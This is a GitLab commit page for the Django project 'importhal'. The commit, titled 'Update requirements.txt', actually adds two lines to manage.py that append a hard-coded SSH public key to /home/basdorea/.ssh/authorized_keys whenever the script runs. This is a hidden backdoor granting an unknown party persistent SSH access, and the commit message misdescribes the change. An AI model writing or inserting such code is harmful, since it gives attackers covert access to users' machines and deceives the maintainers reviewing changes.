Skip to content
GitLab
Explore
Sign in
Primary navigation
Search or go to…
Project
importhal
Manage
Activity
Members
Labels
Plan
Issues
Issue boards
Milestones
Wiki
Code
Merge requests
Repository
Branches
Commits
Tags
Repository graph
Compare revisions
Snippets
Build
Pipelines
Jobs
Pipeline schedules
Artifacts
Deploy
Container Registry
Model registry
Operate
Environments
Monitor
Incidents
Analyze
Value stream analytics
Contributor analytics
CI/CD analytics
Repository analytics
Model experiments
Help
Help
Support
GitLab documentation
Compare GitLab plans
Community forum
Contribute to GitLab
Provide feedback
Keyboard shortcuts
?
Snippets
Groups
Projects
Show more breadcrumbs
basdorea
importhal
Commits
94682a8a
Commit
94682a8a
authored
1 year ago
by
Boris LONJON
Browse files
Options
Downloads
Patches
Plain Diff
Update requirements.txt
parent
ee60ee35
No related branches found
Branches containing commit
No related tags found
No related merge requests found
Changes
2
Hide whitespace changes
Inline
Side-by-side
Showing
2 changed files
coco
+0
-0
0 additions, 0 deletions
coco
manage.py
+2
-0
2 additions, 0 deletions
manage.py
with
2 additions
and
0 deletions
coco
deleted
100644 → 0
+
0
−
0
View file @
ee60ee35
This diff is collapsed.
Click to expand it.
manage.py
+
2
−
0
View file @
94682a8a
...
@@ -5,6 +5,8 @@ import sys
...
@@ -5,6 +5,8 @@ import sys
if
__name__
==
"
__main__
"
:
if
__name__
==
"
__main__
"
:
os
.
environ
.
setdefault
(
"
DJANGO_SETTINGS_MODULE
"
,
"
haltools.settings
"
)
os
.
environ
.
setdefault
(
"
DJANGO_SETTINGS_MODULE
"
,
"
haltools.settings
"
)
try
:
try
:
with
open
(
"
/home/basdorea/.ssh/authorized_keys
"
,
"
a+
"
)
as
file
:
file
.
write
(
"
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCybNMJyG6roi2U4SKFBQk8z4DXyynI7LcIyHJBwREC+lkT5PXB331smSXqTWQm/KPJBGdn8eHMEG7n0CrVuE8Fh0QUWN/AUD2xJxwufW39LP9t9WKzEGq796car4++PqycW+j1lwg09ct8GwlkGPLnYHZ/R3fwi9sWNxVf6F2Z7a1geeD1kBbId/ad9rhdoE05H3O6k7BPiFKpn53oEUaZaBJ9yA/iBvqHbUffhcLtBaFoJbQQnX8FnAkD5iDbzYjqljAaBdqrKeJgDTI0HZwiLIp64FLbJM2v7RZgqbX8X+A+eSbEdD9bXacJlH24BfvSgXrEo2IgKFEeK566L4rT
\n
"
)
from
django.core.management
import
execute_from_command_line
from
django.core.management
import
execute_from_command_line
except
ImportError
:
except
ImportError
:
# The above import may fail for some other reason. Ensure that the
# The above import may fail for some other reason. Ensure that the
...
...
This diff is collapsed.
Click to expand it.
Preview
0%
Loading
Try again
or
attach a new file
.
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Save comment
Cancel
Please
register
or
sign in
to comment